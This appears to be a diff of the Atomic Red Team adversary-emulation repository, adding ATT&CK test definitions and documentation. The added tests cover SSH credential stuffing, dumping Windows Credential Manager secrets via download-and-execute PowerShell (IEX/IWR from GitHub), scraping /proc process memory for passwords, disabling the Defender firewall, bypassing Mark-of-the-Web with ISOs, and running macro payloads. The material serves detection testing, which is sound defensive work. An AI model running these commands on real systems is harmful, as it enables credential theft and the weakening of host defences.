 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  |  |  |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -76,10 +76,10 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
@@ -57,7 +57,7 @@
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -831,7 +831,72 @@ credential-access:
      x_mitre_contributors:
      - Diogo Fernandes
      - Anastasios Pingios
-    atomic_tests: []
+      identifier: T1110.004
+    atomic_tests:
+    - name: SSH Credential Stuffing From Linux
+      auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
+          [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
+          apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+'
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+    - name: SSH Credential Stuffing From MacOS
+      auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+          brew install hudochenkov/sshpass/sshpass
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
  T1552.001:
    technique:
      id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
@@ -1055,6 +1120,32 @@ credential-access:

 '
        name: powershell
+    - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+        Credentials]
+      auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+          -UseBasicParsing); Get-PasswordVaultCredentials -Force   \n"
+    - name: Dump credentials from Windows Credential Manager With PowerShell [web
+        Credentials]
+      auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+          -UseBasicParsing); Get-CredManCreds -Force
+
+'
  T1555.003:
    technique:
      created: '2020-02-12T18:57:36.041Z'
@@ -4839,7 +4930,106 @@ credential-access:
      x_mitre_is_subtechnique: true
      x_mitre_platforms:
      - Linux
-    atomic_tests: []
+      identifier: T1003.007
+    atomic_tests:
+    - name: Dump individual process memory with sh (Local)
+      auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+        copy process memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+          MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+          MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+          MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+          dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
+    - name: Dump individual process memory with Python (Local)
+      auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+        copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        python_script:
+          description: Path to script generating the target process
+          type: Path
+          default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      - description: 'Requires Python
+
+'
+        prereq_command: "(which python || which python3 || which python2)\n"
+        get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          PYTHON=$(which python || which python3 || which python2)
+          $PYTHON #{python_script} $PID #{output_file}
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
  T1606.002:
    technique:
      external_references:
@@ -22189,6 +22379,23 @@ defense-evasion:
 '
        cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1

+'
+        name: command_prompt
+    - name: Disable Microsoft Defender Firewall via Registry
+      auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+      description: |
+        Disables the Microsoft Defender Firewall for the public profile via registry
+        Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 1 /f
+
 '
        name: command_prompt
    - name: Allow SMB and RDP on Microsoft Defender Firewall
@@ -27216,7 +27423,78 @@ defense-evasion:
      x_mitre_version: '1.0'
      x_mitre_defense_bypassed:
      - Anti-virus, Application control
-    atomic_tests: []
+      identifier: T1553.005
+    atomic_tests:
+    - name: Mount ISO image
+      auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+      description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
+        Upon successful execution, powershell will download the .iso from the Atomic
+        Red Team repo, and mount the image. The provided sample ISO simply has a Reports
+        shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
+
+'
+        cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
+'
+        name: powershell
+    - name: Mount an ISO image and run executable from the ISO
+      auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+      description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
+        and run hello.exe executable from the ISO. \nUpon successful execution, powershell
+        will download the .iso from the Atomic Red Team repo, mount the image, and
+        run the executable from the ISO image that will open command prompt echoing
+        \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
+        Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+        \ "
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: |
+          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $driveLetter = ($keep | Get-Volume).DriveLetter
+          invoke-item "$($driveLetter):\hello.exe"
+        cleanup_command: |
+          Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+          Stop-process -name "hello" -Force -ErrorAction ignore
+        name: powershell
  T1036.004:
    technique:
      external_references:
@@ -27448,7 +27726,33 @@ defense-evasion:
      x_mitre_contributors:
      - Yossi Weizman, Azure Defender Research Team
      - Vishwas Manral, McAfee
-    atomic_tests: []
+      identifier: T1036.005
+    atomic_tests:
+    - name: Execute a process from a directory masquerading as the current parent
+        directory.
+      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+      description: 'Create and execute a process from a directory masquerading as
+        the current parent directory (`...` instead of normal `..`)
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        test_message:
+          description: Test message to echo out to the screen
+          type: String
+          default: Hello from the Atomic Red Team test T1036.005#1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          mkdir $HOME/...
+          cp $(which sh) $HOME/...
+          $HOME/.../sh -c "echo #{test_message}"
+        cleanup_command: |
+          rm -f $HOME/.../sh
+          rmdir $HOME/.../
  T1556:
    technique:
      external_references:
@@ -34289,30 +34593,26 @@ defense-evasion:
    atomic_tests:
    - name: WINWORD Remote Template Injection
      auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
-      description: 'Open a .docx file that loads a remote .dotm macro enabled template.
-        Executes the code specified within the .dotm template.Requires download of
-        WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens
-        Calculator.exe when test sucessfully executed, while AV turned off.
-
-'
+      description: "Open a .docx file that loads a remote .dotm macro enabled template
+        from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+        \nExecutes the code specified within the .dotm template.\nRequires download
+        of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+        \ \nDefault docs file opens Calculator.exe when test sucessfully executed,
+        while AV turned off.\n"
      supported_platforms:
      - windows
      input_arguments:
-        docx file:
+        docx_file:
          description: Location of the test docx file on the local filesystem.
          type: Path
          default: PathToAtomicsFolder\T1221\src\Calculator.docx
-        dotm template:
-          description: Location of the test dotm template on the remote server.
-          type: Path
-          default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
      dependency_executor_name: powershell
      dependencies:
      - description: ''
        prereq_command: ''
        get_prereq_command: ''
      executor:
-        command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
+        command: 'start #{docx_file}

 '
        name: command_prompt
@@ -41712,11 +42012,11 @@ persistence:
      - windows
      executor:
        command: |
-          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-          if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+          mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
          echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
        cleanup_command: |
-          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
          del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
        name: command_prompt
  T1137.001:
@@ -52421,7 +52721,7 @@ discovery:
        vbscript:
          description: Path to sample script
          type: String
-          default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+          default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
      executor:
        command: 'cscript #{vbscript}'
        name: powershell
@@ -58262,6 +58562,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -58323,6 +58624,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -58361,6 +58663,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -58398,6 +58701,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
@@ -58532,6 +58836,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
        name: powershell
@@ -60630,6 +60935,7 @@ execution:
 '
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
        cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
@@ -60667,7 +60973,8 @@ execution:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
          -officeProduct \"Word\" -sub \"Extract\"\n"
        cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -0,0 +1,134 @@
+# T1003.007 - Proc Filesystem
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
+<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
+
+This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+
+- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
+
+
+<br/>
+
+## Atomic Test #1 - Dump individual process memory with sh (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+copy process memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path} 
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Dump individual process memory with Python (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+PYTHON=$(which python || which python3 || which python2)
+$PYTHON #{python_script} $PID #{output_file}
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path} 
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+(which python || which python3 || which python2) 
+```
+##### Get Prereq Commands:
+```sh
+echo "Python 2.7+ or 3.4+ must be installed"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,106 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory with sh (Local)
+  auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+    copy process memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+      MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+      MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+      MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
